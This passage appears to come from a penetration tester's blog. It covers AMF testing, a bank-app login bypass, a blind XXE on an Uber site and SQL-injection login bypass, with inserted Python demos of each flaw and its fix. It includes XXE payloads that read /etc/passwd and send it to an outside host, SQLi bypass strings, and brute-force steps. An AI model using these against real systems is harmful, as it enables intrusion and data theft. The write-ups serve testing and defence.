Saturday, 12 October 2019

Getting started with AMF Flash Application Penetration Testing !

What is Action Message Format (AMF)? TL;DR:
AMF is a binary message serialization format geared for remote procedure calls, native to Adobe Flash Player and Adobe Integrated Runtime (AIR). There are two versions of the format, AMF0 and AMF3. AMF3 is more compact than AMF0 and supports data types that are available only in ActionScript 3.0, such as ByteArray.

Tools required:
1. Burp Suite < Download >
2. amf-deserializer Burp Suite Extender plugin < Download >
3. Blazer Burp Suite Extender plugin < Download >

Testing approach:
Step 1. Intercept the AMF requests (remote procedure calls) with Burp Suite.
Step 2. Decode the AMF objects with amf-deserializer.
Step 3. Create new requests by converting the AMF request to XML with amf-deserializer.
Step 4. Once the request is created, import the XML request into Burp Suite Repeater.
Step 5. The XML tab now shows all parameters. Use those parameters as entry/injection points for further manual web application tests (SQLi, LFI, XSS etc.).
Step 6. Automate security tests using Burp Scanner or the Blazer extension for Burp Suite.
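To see what amf-deserializer is actually unpacking, here is an added example (mine, not code from the post or from the amf-deserializer/Blazer projects): a minimal AMF0 codec in Python covering the types that carry most remoting calls (number, boolean, string, null, anonymous object, strict array) plus the packet envelope of headers and messages. The "SearchService.find" call it decodes and tampers with is constructed for the example, not captured from a real application. AMF3 bodies, typed objects and reference tables are out of scope; for those, use the Burp extensions above.

```python
import struct

# AMF0 type markers used below (subset of the AMF0 specification).
NUMBER, BOOLEAN, STRING, OBJECT, NULL, OBJECT_END, STRICT_ARRAY = 0x00, 0x01, 0x02, 0x03, 0x05, 0x09, 0x0A


def _utf8(s):
    """AMF0 UTF-8 string: big-endian u16 byte length followed by the bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def _read_utf8(buf, pos):
    n, = struct.unpack_from(">H", buf, pos)
    return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n


def encode_value(v):
    """Serialize a Python value as an AMF0 value (type marker + payload)."""
    if v is None:
        return bytes([NULL])
    if isinstance(v, bool):                       # bool before int: bool is an int subclass
        return bytes([BOOLEAN, int(v)])
    if isinstance(v, (int, float)):               # AMF0 has a single numeric type: IEEE-754 double
        return bytes([NUMBER]) + struct.pack(">d", float(v))
    if isinstance(v, str):
        return bytes([STRING]) + _utf8(v)
    if isinstance(v, list):
        return bytes([STRICT_ARRAY]) + struct.pack(">I", len(v)) + b"".join(map(encode_value, v))
    if isinstance(v, dict):                       # anonymous object: (name, value)* then "" + object-end
        props = b"".join(_utf8(k) + encode_value(x) for k, x in v.items())
        return bytes([OBJECT]) + props + _utf8("") + bytes([OBJECT_END])
    raise TypeError("unsupported type: " + type(v).__name__)


def decode_value(buf, pos=0):
    """Parse one AMF0 value at buf[pos]; returns (value, position after it)."""
    marker, pos = buf[pos], pos + 1
    if marker == NUMBER:
        return struct.unpack_from(">d", buf, pos)[0], pos + 8
    if marker == BOOLEAN:
        return buf[pos] != 0, pos + 1
    if marker == STRING:
        return _read_utf8(buf, pos)
    if marker == NULL:
        return None, pos
    if marker == STRICT_ARRAY:
        count, = struct.unpack_from(">I", buf, pos)
        items, pos = [], pos + 4
        for _ in range(count):
            item, pos = decode_value(buf, pos)
            items.append(item)
        return items, pos
    if marker == OBJECT:
        obj = {}
        while True:
            name, pos = _read_utf8(buf, pos)
            if name == "" and buf[pos] == OBJECT_END:
                return obj, pos + 1
            obj[name], pos = decode_value(buf, pos)
    raise ValueError("unsupported AMF0 marker 0x%02x at offset %d" % (marker, pos - 1))


def encode_packet(messages, version=0, headers=()):
    """AMF packet: version (0 = AMF0), header count, message count, then the headers
    (name, must-understand flag, length, value) and the messages (target URI,
    response URI, length, AMF0-encoded body)."""
    out = [struct.pack(">HHH", version, len(headers), len(messages))]
    for name, must_understand, value in headers:
        enc = encode_value(value)
        out.append(_utf8(name) + bytes([int(must_understand)]) + struct.pack(">I", len(enc)) + enc)
    for target, response, body in messages:
        enc = encode_value(body)
        out.append(_utf8(target) + _utf8(response) + struct.pack(">I", len(enc)) + enc)
    return b"".join(out)


def decode_packet(buf):
    """Inverse of encode_packet: returns (version, headers, messages)."""
    version, n_headers, n_messages = struct.unpack_from(">HHH", buf, 0)
    pos, headers, messages = 6, [], []
    for _ in range(n_headers):
        name, pos = _read_utf8(buf, pos)
        must_understand, pos = bool(buf[pos]), pos + 5   # skip the flag byte and the u32 length
        value, pos = decode_value(buf, pos)
        headers.append((name, must_understand, value))
    for _ in range(n_messages):
        target, pos = _read_utf8(buf, pos)
        response, pos = _read_utf8(buf, pos)
        pos += 4            # declared body length (may be 0xFFFFFFFF = unknown); the value itself tells us where it ends
        body, pos = decode_value(buf, pos)
        messages.append((target, response, body))
    return version, headers, messages


def tamper(packet, name, new_value):
    """Decode a remoting call, replace every argument property called `name`, re-encode.
    This is the by-hand equivalent of editing the XML that amf-deserializer shows and replaying it."""
    version, headers, messages = decode_packet(packet)
    for _, _, body in messages:
        for arg in (body if isinstance(body, list) else [body]):
            if isinstance(arg, dict) and name in arg:
                arg[name] = new_value
    return encode_packet(messages, version, headers)


# Constructed remoting call (not captured from a real application): SearchService.find({"q": "cat", "page": 0})
SAMPLE_CALL = encode_packet([("SearchService.find", "/1", [{"q": "cat", "page": 0}])])

if __name__ == "__main__":
    print(decode_packet(SAMPLE_CALL))
    print(decode_packet(tamper(SAMPLE_CALL, "q", "cat' OR '1'='1")))
```

The body is sent as application/x-amf; every string and number inside it is a candidate injection point exactly as it would be in a JSON or form body, which is why the XML view the extensions produce is enough to drive Scanner and Intruder.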

A penetration testing #TrueStory: XML External Entity (XXE) bugs to the rescue:
Recently my team and I were asked to perform an external and internal security audit for an organization. The organization we were going to test was very mature in cyber security: it runs 360-degree security audits quarterly, with precautions such as IDS, WAF, firewalls and honeypots deployed for its networks and applications. Our team was assigned external as well as internal penetration testing of its networks and applications. As my expertise is more in application security, I took the application testing part, while the network assessment was taken by the rest of the team.

After four weeks of assessment we started sharing our findings with the client. The network assessment was going great, as the team had found many unpatched and outdated systems, software and packages in the network. On the other hand, the application security assessment was not going as planned, because I was unable to find any Critical or High severity vulnerabilities.

The deadline to submit the final report was near, so I started working on the report. While working on it I opened my Burp Suite session for one of the applications to count the number of links, parameters etc., and suddenly I realised I had made a big mistake...!

Figure 1. The Mistake

The mistake was that I had left the "Flash files" and "Other binary" MIME types unchecked in the site map filter, so those responses were hidden. On ticking the checkboxes I found various file types like SVG, AMF, ZIP etc. added to my Burp session.

  Figure 2. Rectification of mistake

After analysing the files now visible in my session, I sorted out the AMF (Flash application) files, then quickly downloaded and installed the amf-deserializer Burp Suite Extender plugin to decode the AMF content and extract some juicy information.


  Figure 3. amf-deserializer project

1. Download the amf-deserializer project and extract it to a folder.
2. Open Burp Suite.
3. Navigate to the Extender tab and add the JAR file "\amf-deserializer-master\executables\AMFDSer-ngng.jar".


  Figure 4. Importing AMFDSer-ngng.jar

4. Load the AMFD plugin

   Figure 5. Loading AMFDSer-ngng.jar

Once the plugin loads successfully you will see a "Deserialized AMF" tab, in which the AMF object is shown decoded as XML.

Now I converted all AMF objects to XML requests and started my security tests using Burp Suite and Blazer.

A. AMF Request 

Figure a. AMF Request
B. Deserialized AMF

Figure b. Deserialized AMF

1. Download Blazer


   Figure 6. Blazer project

2. Navigate to the Extender tab, then the BApp Store, and install Blazer.
 

  Figure 7. Loading Blazer

3. To automate the tests with Blazer, right-click the AMF request and choose the "Blazer - AMF testing" option.
 

   Figure 8. Automating test using Blazer

As I had little time left to test this application, I used Burp Scanner to automate security tests on the converted AMF requests.

Figure 9. Burpsuite scanner result

After an hour of scanning I got alerts for XXE injection. To exploit the XXE I used the converted AMF request's XML parameters and created a new XML request in Repeater.

Steps to reproduce the XXE exploitation:
1. Send the vulnerable AMF request to Repeater.
2. Go to the Deserialized AMF tab and place the XXE payload in the XML parameters (the entry/injection points).
3. Replay the request.





Figure 10. Creating vulnerable request 


Figure 11. Vulnerable request response


And finally my assessment was finished, as I found more Critical and High severity vulnerabilities like SQLi, XSS and OTP brute force in the application by manipulating the converted AMF requests' XML parameters.

Tuesday, 15 May 2018

Less Time To Perform Penetration Tests? Look For Known Bugs...!!


August 1st 2017, evening,

I was having my evening tea, with a few hours left before a day off, when my manager suddenly assigned me a new task. He rushed over to me and said: "Dear Raghav, you have to perform a quick security test on website ABC and its sub-domains. Try to wrap it up in an hour or two. Find any critical or high bug and write the incident report so we can impress our client and buy proper time to perform the security assessment."

The moment I received the e-mail about the project, my first move was to enumerate sub-domains, using techniques like Google/Bing search operators, reverse IP lookups, dnsdumpster.com, Knock sub-domain scan and the Acunetix sub-domain scanner.


Fig.1 Sub-domain Scanning


With the list of sub-domains ready, I quickly opened Firefox, installed the Wappalyzer add-on and started looking up the technologies and their versions for each domain. After 10 minutes I had finished mapping technology versions to the targeted domains. After some thought I selected two domains that were running Java and Oracle Commerce; my next move was to search for known vulnerabilities in these technologies, since their versions were disclosed and that would be the easiest way to exploit them in the little time available.

To achieve this I had two options: the hard way, searching for vulnerabilities on nvd.nist.gov, cve.mitre.org, www.cvedetails.com or www.exploit-db.com; or creating a profile for Java and Oracle vulnerabilities in the Acunetix web scanner and crawling and scanning the websites with it.

So I chose option two and created a profile for Oracle and Java vulnerabilities.




Fig.2 Profile Creation

Now I crawled both websites manually using the Acunetix HTTP Sniffer and imported both into scans with the newly created profile. Within 5 minutes I got two critical alerts, one from each scan.

First: Oracle Reports rwservlet vulnerabilities


Fig.3 rwservlet vulnerabilities


Second: WebLogic Server Side Request Forgery


Fig.4 Weblogic SSRF


Now I had to confirm whether the alerts were false positives. After some research on the Oracle Reports rwservlet vulnerabilities I came across a direct exploit on Exploit-DB for Oracle Reports (CVE-2012-3153) and the Rapid7 Metasploit module "Oracle Forms and Reports Remote Code Execution".


Fig.5 OS Shell


Next, for the WebLogic Server Side Request Forgery, I set up a server and enabled its access logs. With the Acunetix HTTP Editor I replayed the vulnerable request with my server's IP as the payload and started monitoring the incoming requests.

Fig.6 Out Of Band Calls


Finally I had two confirmed critical vulnerabilities, with sufficient time left to write the incident report...;)

Thursday, 6 July 2017

Logical Authentication Bypass Vulnerability

On the morning of 28th September 2015 I received an e-mail from a colleague asking me to perform a penetration test on the Android application of a bank, "ABC" (for security reasons I am not disclosing the name of the application). The time limit was short: I had to complete the test and the report in 2 days. So I went looking for a critical vulnerability. One day passed, and I had checked for most injection and session management vulnerabilities, but there was no luck.

After giving the application some more thought I lost hope and started writing the report, when suddenly my eye caught a glimpse of the authentication request going to the server.

To understand the request you have to understand the login functionality of the application. The developers were trying to be smart: at registration they asked for a password and a memorable keyword for accessing your account in the app, each under a security policy like:
1. At least 8 characters.
2. Must contain one upper-case and one lower-case letter.

But for login the developers thought it would be more secure if the app asked for these three things for a successful sign-in:
1. Email ID
2. 3 given positions of the memorable keyword
3. 3 given positions of the password


The trick used by the developers sounds good, but it weakens the effective strength of the password and memorable word from 8+ characters to 3 characters each.

Since only 3 characters are requested, the memorable word and password could each be brute forced in about 26x26x26 combinations, but getting both to match at the same time could take days. So brute forcing was not the plan.

Now, Find The Bug...!!!

The authentication request contained:
1. Email ID
2. 3 given positions of the memorable keyword
3. 3 given positions of the password

But the developers' biggest mistake was that the request also carried the positions themselves, <PINSeq>{3,4,7} & <PwDSeq>{2,3,5}.


A thought came to my mind: what if I change <PINSeq>{3,4,7} & <PwDSeq>{2,3,5} to <PINSeq>{1,1,1} & <PwDSeq>{1,1,1}? So I forged the same request with <PINSeq>{1,1,1} & <PwDSeq>{1,1,1}, followed by the memorable word and password <PIN>qqq & <PwD>qqq, and sent it to the server, as my test account's credentials were:
MW: qWerty123
PW: queEn123

So the first position of both the memorable word and the password is "q", hence <PIN>qqq & <PwD>qqq.
After forwarding the request to the server I got a 200 OK response with Boolean true.


So my test was successful, and the problem of the 26x26x26 combinations for memorable word and password was solved....

As I was able to edit the sequence, I could fix it to positions 1,1,1, meaning the first letter of the password and of the memorable word.

Now my only task was to find the 3-letter memorable word and password, which became easy: with the positions fixed at 1,1,1 I only had to try 26+26 candidates for the password and memorable word (52+52 if you include upper-case first letters, which the registration policy allows).

E.g. positions 1,1,1 are fixed for the password and memorable word,
and the victim's password and memorable word always start with a letter from:
{ a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z }
so I have to brute force values like:
{aaa,bbb,ccc,ddd,eee,fff,ggg,hhh,iii,jjj,kkk,lll,mmm,nnn,ooo,ppp,qqq,rrr,sss,ttt,uuu,
vvv,www,xxx,yyy,zzz}

With this logic in mind I used the Burp Suite Intruder tool...
First I asked my test account handler to change the password, so I could test my authentication bypass theory on credentials I did not know.

Then,

1. I sent the original request to Intruder with the victim's Email ID.
2. Changed the sequences to <PINSeq>{1,1,1} & <PwDSeq>{1,1,1}.


3. Marked the position and added the payload list a,b,c,..........z.


4. Launched the 26-character brute force attack for the first letter of the memorable word...


The response was 200 OK with Boolean true at <IsPinValid>.


So the first letter of the new memorable word was clear: "c,c,c" = "c".

5. Launched the 26-character brute force attack for the first letter of the password...


The response was 200 OK with Boolean true at <IsPwdValid>.


So the first letter of the new password was "r,r,r" = "r".

6. Now I finally had the first letter of the memorable word and of the password, "c" and "r" respectively, so I started logging in to the app. At the login page I intercepted the HTTP request and changed the sequences <PINSeq>{3,4,7} & <PwDSeq>{2,3,5} to <PINSeq>{1,1,1} & <PwDSeq>{1,1,1}, followed by the memorable word <pin>ccc</pin> and password <pwd>rrr</pwd>,
and forwarded the request to the server.....


Got 200 OK in response with Boolean <IsPINValid>true</IsPINValid> & <IsPwdValid>true</IsPwdValid>.

Successful Login ....:)
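The flaw above is that the server let the client choose which positions it would check. Here is an added example (mine, not the bank's code or anything from the post) that models the vulnerable check, replays the {1,1,1} Intruder attack against it, and shows the fix: the server picks three distinct positions per attempt, keeps them in the session, and verifies only the characters. The test account, the request shape (PINSeq/PwDSeq/PIN/PwD) and the lockout threshold are assumptions for the example; the secrets mirror the post's test account.

```python
import hmac
import random
import string

# Constructed test account standing in for the post's test user (MW: qWerty123, PW: queEn123).
ACCOUNT = {"email": "test@example.com", "pin": "qWerty123", "pwd": "queEn123"}
ACCOUNTS = {ACCOUNT["email"]: ACCOUNT}


def chars_at(secret, positions):
    """Characters at the given 1-based positions (the app's <PINSeq>/<PwDSeq> convention)."""
    return "".join(secret[p - 1] for p in positions)


def vulnerable_login(req, accounts=ACCOUNTS):
    """The flaw from the post: PINSeq/PwDSeq arrive in the request and are trusted, so the
    client, not the server, decides which positions are being checked."""
    acct = accounts[req["email"]]
    return {
        "IsPINValid": hmac.compare_digest(chars_at(acct["pin"], req["PINSeq"]), req["PIN"]),
        "IsPwdValid": hmac.compare_digest(chars_at(acct["pwd"], req["PwDSeq"]), req["PwD"]),
    }


def recover_first_chars(login, email, alphabet=string.ascii_letters):
    """The Intruder run from the post: pin both sequences to {1,1,1} and send one character
    repeated three times until each validity flag flips to true. Returns (found, attempts)."""
    found, attempts = {}, 0
    for field, flag in (("PIN", "IsPINValid"), ("PwD", "IsPwdValid")):
        for ch in alphabet:
            attempts += 1
            req = {"email": email, "PINSeq": [1, 1, 1], "PwDSeq": [1, 1, 1], "PIN": ch * 3, "PwD": ch * 3}
            if login(req)[flag]:
                found[field] = ch
                break
    return found, attempts


class PositionChallenge:
    """Server-side fix: the server chooses three distinct positions per secret, stores them in
    the session and verifies against those; the request carries only the characters."""
    MAX_FAILURES = 5          # assumption: lock after five failed attempts

    def __init__(self, accounts=ACCOUNTS, rng=None):
        self.accounts, self.rng = accounts, rng or random.SystemRandom()
        self.sessions, self.failures = {}, {}

    def challenge(self, email):
        if self.failures.get(email, 0) >= self.MAX_FAILURES:
            raise PermissionError("account locked: too many failed attempts")
        acct = self.accounts[email]
        pin_pos = sorted(self.rng.sample(range(1, len(acct["pin"]) + 1), 3))
        pwd_pos = sorted(self.rng.sample(range(1, len(acct["pwd"]) + 1), 3))
        self.sessions[email] = (pin_pos, pwd_pos)
        return {"PINSeq": pin_pos, "PwDSeq": pwd_pos}

    def verify(self, email, pin_chars, pwd_chars):
        pin_pos, pwd_pos = self.sessions.pop(email)   # one attempt per challenge; the next one re-randomises
        acct = self.accounts[email]
        ok = hmac.compare_digest(chars_at(acct["pin"], pin_pos), pin_chars) & \
             hmac.compare_digest(chars_at(acct["pwd"], pwd_pos), pwd_chars)
        if not ok:
            self.failures[email] = self.failures.get(email, 0) + 1
        return ok


if __name__ == "__main__":
    print(recover_first_chars(vulnerable_login, ACCOUNT["email"]))
    srv = PositionChallenge()
    ch = srv.challenge(ACCOUNT["email"])
    print(ch, srv.verify(ACCOUNT["email"], "qqq", "qqq"))
```

Against the vulnerable check, the whole attack costs at most 52 requests per secret; against the fixed flow the attacker gets one guess per server-chosen triple and is locked out after a handful of failures, which is what the positional scheme was supposed to buy in the first place.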



Thanks...!!!!!!


-Raghav Bisht

Friday, 5 August 2016

Blind OOB XXE At Uber: 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I found an XXE in one of Uber's websites that was in scope of the bug bounty program.

On the evening of July 26th 2016 I was working on the ubermovement web application.
As it was a small web app, there were not many parameters to run injection tests against. I started the old-school tests, and the first parameter I came across was the search box.


I attached Burp Suite, entered a keyword to search and started monitoring the requests...

In the "search" directory I got two requests:
1. The keyword I searched: http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Against the first request I started attacks like XSS, SQL, XPath, XXE, command injection and many more.....

But they all failed and I didn't find any vulnerability.

Then I started my tests on the second request...

As it had no parameters, I sent the request to Repeater and started looking for directory-based vulnerabilities.

 
Then, as all my other injection tests had failed, I finally started looking for XXE.

So the first thing I did was change the request method to POST and check the response.



As the response was the same as for the GET request, I added the Content-Type header application/xml
and a basic XML body with "GeneralSearch" as the search parameter, then checked the response:
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The response was surprising: I got an XML error.

Now I was about 60% sure it could lead to XXE, so I started the blind test for XXE
with different payloads...
E.g.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But still no luck: all I got was the XML error in the response....

Then I thought: let's check for the vulnerability via the OOB (out-of-band) method and perform a ping test.

So,
step-1: I downloaded XAMPP and hosted an Apache server.
step-2: I port-forwarded port 80 to my machine so the server was reachable on my public IP from other networks.
step-3: I edited the XXE payload to (0.0.0.0 stands in for the listener's address):

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4: Sent the request and got the error.


step-5: I checked my server logs and saw a perfect ping from the vulnerable application.




The manual test confirmed the vulnerability, so I scanned the vulnerable request with Acunetix and it detected the vulnerability too.


 
I reported the bug first and then started further tests with .dtd payloads.

It turned out that various sub-domains of *.ubermovement.com had the same flaw.

Google dork: site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test summary:

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/, which indicates that this script is vulnerable to XXE injection.
NOTE: As this was a blind XXE test, I succeeded in the ping test but was unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps to reproduce:

  1. Go to the website: http://ubermovement.com/
  2. Attach Burp Suite and start intercepting; now click on search and search...
  3. Grab the GET request

    E.g. original HTTP request:

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
  4. Send the request to Repeater and change the method to POST.

E.g. request after changing to POST:

POST /api/search/GeneralSearch HTTP/1.1
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
  5. Now add the content type, e.g. Content-type: application/xml

The request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
  6. Deploy a web server and host a "payload.dtd" file, e.g.:

    payload.dtd:

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;
  7. Now add the XXE payload for confirmation:
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [ 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

The request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>
NOTE: If you view your web server logs you will find a 404 error.
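Both XXE findings on this page (the AMF one above and this Uber one) come down to a parser that resolves external entities. The added example below is mine, not code from Uber, Acunetix or the post: it parses a <GeneralSearch> body with Python's xml.sax in the weak configuration (external general entities resolved) and in the hardened one, reading back a planted local file through the in-band payload, and then recovers data from the out-of-band callback of the "http://xxe.me/content?%file;" trick by parsing a constructed Apache access-log line. The secret file, the log line and the 404 callback shape are constructed for the example.

```python
import io
import re
import tempfile
import urllib.parse
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class _TextCollector(ContentHandler):
    """Gathers the character data of the document (the 'search term' the app would use)."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, data):
        self.parts.append(data)


def parse_search(body, resolve_external_entities=False):
    """Parse a <GeneralSearch> request body and return its text content.

    resolve_external_entities=True reproduces the weak configuration: xml.sax fetches
    SYSTEM entities (file://, http://, ...) and splices the result into the document,
    which is exactly the behaviour the post's payloads rely on.
    """
    if not resolve_external_entities and b"<!DOCTYPE" in body:
        raise ValueError("DTD not allowed")        # hardened: refuse any inline DTD up front
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)   # default is False (safe)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(body))
    return "".join(collector.parts)


def xxe_body(entity_url):
    """The in-band payload from the post, parameterised on the SYSTEM identifier."""
    return (b'<?xml version="1.0" encoding="utf-8"?>\n'
            b'<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "' + entity_url.encode() + b'"> ]>\n'
            b'<GeneralSearch>&xxe;</GeneralSearch>')


def run_demo():
    """Plant a local 'secret' file, read it through the weak parser, then try the hardened one."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("s3cret-token-42")                  # constructed stand-in for /etc/passwd
    body = xxe_body(Path(f.name).as_uri())
    leaked = parse_search(body, resolve_external_entities=True)
    try:
        parse_search(body)
        hardened = "parsed"
    except ValueError as err:
        hardened = str(err)
    return leaked, hardened


# Blind / out-of-band: when nothing is reflected, the data travels in the URL the parser
# fetches (the 'http://xxe.me/content?%file;' trick above). The listener only needs an access log.
_CALLBACK = re.compile(r'"GET /content\?(?P<data>[^ "]*) HTTP/1\.[01]" (?P<status>\d{3})')

# Constructed Apache access-log line; a 404 is expected because nothing serves /content.
SAMPLE_LOG = (
    '203.0.113.5 - - [26/Jul/2016:19:42:07 +0000] '
    '"GET /content?root:x:0:0:root:/root:/bin/bash HTTP/1.1" 404 196 "-" "Java/1.8.0_60"\n'
)


def recover_exfil(access_log):
    """Pull the exfiltrated data back out of the callback request lines."""
    return [urllib.parse.unquote(m.group("data")) for m in _CALLBACK.finditer(access_log)]


if __name__ == "__main__":
    print(run_demo())
    print(recover_exfil(SAMPLE_LOG))
```

The byte-string DOCTYPE check is only a pre-filter; in a real service disable DTD processing in the parser itself (for Python, defusedxml does this), and remember that multi-line files such as /etc/passwd break the URL-based exfil above, which is one reason a ping can succeed while the content never arrives.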

Wednesday, 11 May 2016

That Moment When You Find An Authentication Bypass Vulnerability In A Bug Bounty Program?

A whole year has passed since I joined bug bounty programs on various platforms, and all I could find was a handful of XSS, XFS, CSRF and CRLF vulnerabilities, 2 to 3 logical bugs and about a million duplicates...

On the evening of 22nd Dec 2015 I started looking for sub-domains of a website that had been newly introduced to a bug bounty program. After fingerprinting all domains I found a unique one hosted on an IIS server and running ASP.NET at the back end. An Nmap scan gave me the server and technology versions: the web application was running on Windows Server 2003, Microsoft IIS 6.0 with Microsoft SQL Server 2005. That was far too old for 2015, so I went old school on one of the page parameters and searched for SQL injection.


I injected a quote and within seconds received a SQL error. Now I was sure SQL injection was present in this sub-domain. As it was only a sub-domain the severity of the bug was lower, so my main job was to find as many unique SQL bugs in the web application as possible.

My second thought was to check for all the SQL injections, so I ran an automated SQL scan against the web app.


After a full scan of the web application I found 3 unique parameters with SQL injection. Luckily 2 of those parameters were "Email" & "Password". Seeing them, I got the idea of bypassing authentication via SQLi, so now I was able to report two different types of bug:
1. Authentication bypass via SQLi
2. Error-based SQL injection

Now comes the POC part for both. Exploiting error-based SQL injection is easy if you know how to perform the attack; alternatively you can use modern automated injection tools to create the POC. I used sqlmap to create the POC for the error-based SQL injection.
   


Now, creating the POC for authentication bypass via SQLi...
1. I opened the admin login page.


2. Intercepted the authentication request with Burp Suite.


3. Started trying different SQLi payloads; the list went like:
' or ' 1 ' = ' 1
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

and in the end the payload 'or' '=' worked for me.
wooooooooooo..... at last! (This one succeeds on SQL Server because T-SQL pads the shorter string with trailing spaces before comparing, so ' ' = '' evaluates to true; not every database engine does this.)

So both POCs were created, and I received a good bug bounty for both reports.
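Here is an added example (mine, not the target's code or anything from the post) that replays the payload list above against a string-built login query and its parameterised replacement. It uses an in-memory SQLite table constructed for the example and injects into the email field with a dummy password; SQLite is deliberately not the target's SQL Server 2005, so the last payload on the list fails here and shows why the winning payload was engine-specific.

```python
import sqlite3


def make_db():
    """Constructed user table (not the target's schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES ('admin@example.com', 'S3cret!Pass', 'admin')")
    db.commit()
    return db


def vulnerable_login(db, email, password):
    """String-built query, the pattern behind the post's finding. Returns the matched email or None."""
    sql = "SELECT email FROM users WHERE email = '%s' AND password = '%s'" % (email, password)
    row = db.execute(sql).fetchone()       # malformed SQL raises sqlite3.OperationalError
    return row[0] if row else None


def safe_login(db, email, password):
    """Parameterised query: values travel separately from the statement, so quotes stay data."""
    row = db.execute("SELECT email FROM users WHERE email = ? AND password = ?",
                     (email, password)).fetchone()
    return row[0] if row else None


def quote_test(db):
    """The single-quote probe from the post: a SQL error back means the input reaches the query."""
    try:
        vulnerable_login(db, "'", "x")
        return None
    except sqlite3.OperationalError as err:
        return str(err)


# The post's payload list, in order.
PAYLOADS = ["' or ' 1 ' = ' 1", "admin' --", "admin' #", "admin'/*", "' or 1=1--", "' or 1=1#",
            "' or 1=1/*", "') or '1'='1--", "') or ('1'='1--", "'or' '='"]


def try_payloads(login, db, payloads=PAYLOADS):
    """Put each payload in the email field (password 'x') and record who we end up logged in as."""
    results = {}
    for p in payloads:
        try:
            results[p] = login(db, "admin@example.com" if False else p, "x")
        except sqlite3.OperationalError as err:
            results[p] = "SQL error: " + str(err)
    return results


if __name__ == "__main__":
    db = make_db()
    print(quote_test(db))
    for payload, outcome in try_payloads(vulnerable_login, db).items():
        print("%-20r -> %r" % (payload, outcome))
    print(try_payloads(safe_login, db))
```

Against the vulnerable query, ' or 1=1-- and ' or 1=1/* log in as the first user in the table; the # payloads are syntax errors in SQLite because # is not a comment marker there; and 'or' '=' returns nothing because SQLite compares ' ' and '' as different strings. The parameterised version returns None for every payload, and still accepts the real credentials.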

- Raghav

Tuesday, 3 May 2016

Old School Source Code Disclosure Vulnerability

On May 2nd I started a re-evaluation of a client's web application. While doing so I found they had added some more functions to the web app. I started exploring the new features, and everything looked fine, as they were all static HTML pages, until suddenly I came across a file "filedownload.php".

My first step was to spider this branch, which I did with Burp Suite; the full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"

The path of the application was disclosed: E:\netpub\vhosts\www\

Then I simply opened the link "http://site.com/filedownload.php?file=" in my browser and received this error message from the server:
